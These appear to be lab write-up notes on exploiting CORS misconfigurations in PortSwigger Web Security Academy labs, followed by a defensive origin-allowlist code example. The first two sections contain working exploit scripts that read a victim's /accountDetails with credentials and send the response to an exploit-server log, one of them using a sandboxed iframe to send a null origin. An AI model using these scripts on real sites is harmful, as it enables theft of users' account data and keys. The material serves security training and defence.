CORS vulnerability with basic origin reflection

If the Access-Control-Allow-Credentials header is present, and when we add `Origin: https://example.com` to our request we observe `Access-Control-Allow-Origin: https://example.com` reflected back, the server reflects any origin it is given.

This means we can put this in the body of the exploit server:

```html
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0ac5009d04822ad180cd30b100b0009b.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>
```

CORS vulnerability with trusted null origin

If the server has a whitelist of authorized origins but also accepts `Origin: null`:

when we add `Origin: null` to our request, the server responds with `Access-Control-Allow-Origin: null` and `Access-Control-Allow-Credentials: true`.

So it is possible to do this (a sandboxed iframe sends a null origin):

```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>
```

CORS vulnerability with trusted insecure protocols

Here, if we submit `Origin: http://example.com` with the GET /accountDetails request, the server doesn't accept it (it does not respond with a matching Access-Control-Allow-Origin header).

But if we submit a subdomain, `Origin: http://grosskibidi.0a1f00e704880fd4874ab1c300a40083.web-security-academy.net`, the server accepts it and responds with:

Access-Control-Allow-Origin: http://grosskibidi.0a1f00e704880fd4874ab1c300a40083.web-security-academy.net
Access-Control-Allow-Credentials: true

Our request must therefore be initiated from a subdomain.

That's convenient: we have stock.0a1f00e704880fd4874ab1c300a40083.web-security-academy.net, which is vulnerable to reflected XSS in productID.
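The fix on the server side is the same for all three cases above: compare the full Origin string against an allowlist, refuse `null`, and refuse non-https schemes, instead of reflecting whatever arrives. The following is an added example, not part of these notes or of the PortSwigger labs; `allowedOrigin`, `corsHeaders` and the allowlist values are assumptions.

```javascript
// Added example: strict CORS origin validation for a credentialed API.
// Not part of the original notes; the allowlist below is constructed.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://stock.app.example.com',
]);

// Return the Access-Control-Allow-Origin value to send, or null to send
// no CORS headers at all. The whole origin string is compared, so
// "null", http:// variants and look-alike hosts are all rejected.
function allowedOrigin(origin, allowlist = ALLOWED_ORIGINS) {
  if (typeof origin !== 'string' || origin === 'null') return null;
  let url;
  try {
    url = new URL(origin);
  } catch {
    return null; // not a well-formed origin
  }
  if (url.protocol !== 'https:') return null; // no insecure schemes
  if (url.origin !== origin) return null; // no paths or trailing slashes
  return allowlist.has(origin) ? origin : null;
}

// Response headers for a credentialed endpoint such as /accountDetails.
// The request's Origin is never reflected unchecked.
function corsHeaders(requestHeaders, allowlist = ALLOWED_ORIGINS) {
  const origin = allowedOrigin(requestHeaders.origin, allowlist);
  if (origin === null) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // caches must key on Origin
  };
}

// Constructed sample requests mirroring the three cases in the notes.
const samples = [
  'https://app.example.com',          // allowlisted: allowed
  'https://attacker.example',         // reflection attempt: refused
  'null',                             // sandboxed iframe: refused
  'http://stock.app.example.com',     // insecure scheme: refused
];
for (const origin of samples) {
  console.log(origin, '=>', JSON.stringify(corsHeaders({ origin })));
}
```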